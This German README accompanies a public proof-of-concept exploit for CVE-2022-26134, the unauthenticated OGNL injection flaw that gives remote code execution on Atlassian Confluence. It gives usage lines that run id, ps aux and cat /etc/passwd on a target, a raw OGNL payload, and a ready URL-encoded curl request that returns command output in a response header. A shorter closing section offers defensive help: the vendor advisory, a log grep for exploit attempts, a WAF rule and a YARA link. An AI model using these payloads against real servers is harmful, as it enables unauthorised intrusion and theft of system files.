
Atlassian Confluence (CVE-2022-26134) - Nicht authentifizierte OGNL-Injection-Schwachstelle (RCE).
Proof-of-Concept-Skript, das die Remote-Codeausführungs-Schwachstelle ausnutzt, die Atlassian Confluence 7.18 und niedrigere Versionen betrifft. Die OGNL-Injection-Schwachstelle ermöglicht es einem nicht authentifizierten Benutzer, beliebigen Code auf einer Confluence-Server- oder Data-Center-Instanz auszuführen.
Alle unterstützten Versionen von Confluence Server und Data Center sind betroffen.
Confluence-Server- und Data-Center-Versionen nach 1.3.0 und unter 7.18.1 sind betroffen.
Die Schwachstelle hat einen CVSS-Score von 10 von 10 und gilt damit als kritisch.
pip install -r requirements.txt
Klonen Sie das Repository:
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
Anschließend können Sie den Exploit mit einem Befehl Ihrer Wahl wie folgt ausführen:
python3 cve-2022-26134.py https://target.com "id"
python3 cve-2022-26134.py https://target.com "ps aux"
python3 cve-2022-26134.py https://target.com "cat /etc/passwd"
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
Das Ergebnis des Befehls wird anschließend im Parameter X-Cmd-Response im Antwort-Header angezeigt.
Befolgen Sie die offiziellen Empfehlungen von Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian hat ein Advisory für die von dieser CVE betroffenen Produkte veröffentlicht, das Sie hier lesen können. Um das Problem zu beheben, müssen Sie Ihre Confluence-Version aktualisieren. Die zum Zeitpunkt der Veröffentlichung vorgeschlagene Liste lautet:
Confluence ist ein Apache-Tomcat-Server, dessen Protokolle unter /opt/atlassian/confluence/logs gespeichert werden. Sie können Befehle wie grep verwenden, um in den Logs nach HTTP-GET-Anfragen zu suchen, deren Payloads die Java-Laufzeitumgebung zur Ausführung von Befehlen nutzen. Zum Beispiel:
grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" in der Datei catalina.out
Diese Schwachstelle betrifft alle selbst gehosteten Instanzen. Wenn Sie eine WAF verwenden, können Sie URLs blockieren, die ${ enthalten.
YARA (von Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
NUR FÜR BILDUNGSZWECKE.
